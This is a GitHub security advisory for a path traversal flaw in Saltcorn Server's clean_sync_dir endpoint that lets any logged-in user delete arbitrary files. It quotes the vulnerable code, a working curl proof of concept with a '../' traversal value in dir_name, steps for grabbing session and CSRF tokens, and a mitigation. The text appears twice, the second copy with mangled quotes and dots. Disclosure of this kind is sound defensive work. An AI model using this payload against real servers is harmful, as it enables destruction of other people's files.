

GHSA-43f3-h63w-p6f6: Saltcorn Server allows logged-in users to delete arbitrary files because of a path traversal vulnerability


A logged-in user with any role can delete arbitrary files on the filesystem by calling the sync/clean_sync_dir endpoint. The dir_name POST parameter is not validated/sanitized and is used to construct the syncDir that is deleted by calling fs.rm.


  • file:
  error_catcher(async (req, res) => {
    const { dir_name } = req.body; // [1] source
    try {
      const rootFolder = await File.rootFolder();
      const syncDir = path.join(
        dir_name // [2]
      await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink
    } catch (error) {
      getState().log(2, `POST /sync/clean_sync_dir: '${error.message}'`);
      res.status(400).json({ error: error.message || error });


The following PoC can be executed with a user with any role (admin, staff, user, public)

  • create a file in a folder different from where the server is started:
touch /tmp/secret
cat /tmp/secret
  • log with a user and retrieve valid connect.sid and _csrf values***
  • send the following curl request
curl -i -X $'POST' \
  -H $'Host: localhost:3000' \
  -H $'Content-Type: application/x-www-form-urlencoded' \
  -H $'Content-Length: 93' \
  -H $'Origin: http://localhost:3000' \
  -H $'Connection: close' \
  -b $'connect.sid=VALID_CONNECT_SID_COOKIE; loggedin=true' \
  --data-binary $'_csrf=VALID_CSRF_VALUE&dir_name=/../../../../../../../../../../tmp/secret' \
  • check if the file previously created does not exist anymore:
cat /tmp/secret
cat: /tmp/secret: No such file or directory

*** obtain connect.sid and _csrf values

A possible way to retrieve connect.sid and _csrf values is to use the password reset functionality:

  • log in
  • open the browser developer console, go to the Network tab filter for settings request
  • visit http://localhost:3000/auth/settings
  • trigger the change password functionality
  • under the Headers and Request tabs, grab the connect.sid and _csrf values and replace them in the curl command


Arbitrary file delete

Recommended Mitigation

Resolve the syncDir and check if it starts with rootFolder.location/mobile_app/sync.



A logged-in user with any role can delete arbitrary files on the filesystem by calling the sync/clean_sync_dir endpoint. The dir_name POST parameter is not validated/sanitized and is used to construct the syncDir that is deleted by calling fs.rm.


  • file: "/clean_sync_dir", error_catcher(async (req, res) => { const { dir_name } = req.body; // [1] source try { const rootFolder = await File.rootFolder(); const syncDir = path.join( rootFolder.location, "mobile_app", "sync", dir_name // [2] ); await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink res.status(200).send(“”); } catch (error) { getState().log(2, `POST /sync/clean_sync_dir: '${error.message}’`); res.status(400).json({ error: error.message || error }); } }) );


The following PoC can be executed with a user with any role (admin, staff, user, public)

  • create a file in a folder different from where the server is started:

    touch /tmp/secret cat /tmp/secret

  • log with a user and retrieve valid connect.sid and _csrf values***

  • send the following curl request

    curl -i -X $’POST’
    -H $’Host: localhost:3000’
    -H $’Content-Type: application/x-www-form-urlencoded’
    -H $’Content-Length: 93’
    -H $’Origin: http://localhost:3000’
    -H $’Connection: close’
    -b $’connect.sid=VALID_CONNECT_SID_COOKIE; loggedin=true’
    –data-binary $’_csrf=VALID_CSRF_VALUE&dir_name=/…/…/…/…/…/…/…/…/…/…/tmp/secret’

  • check if the file previously created does not exist anymore:

    cat /tmp/secret cat: /tmp/secret: No such file or directory

*** obtain connect.sid and _csrf values

A possible way to retrieve connect.sid and _csrf values is to use the password reset functionality:

  • log in
  • open the browser developer console, go to the Network tab filter for settings request
  • visit http://localhost:3000/auth/settings
  • trigger the change password functionality
  • under the Headers and Request tabs, grab the connect.sid and _csrf values and replace them in the curl command


Arbitrary file delete

Recommended Mitigation

Resolve the syncDir and check if it starts with rootFolder.location/mobile_app/sync.


  • GHSA-43f3-h63w-p6f6
  • saltcorn/saltcorn@3c55126

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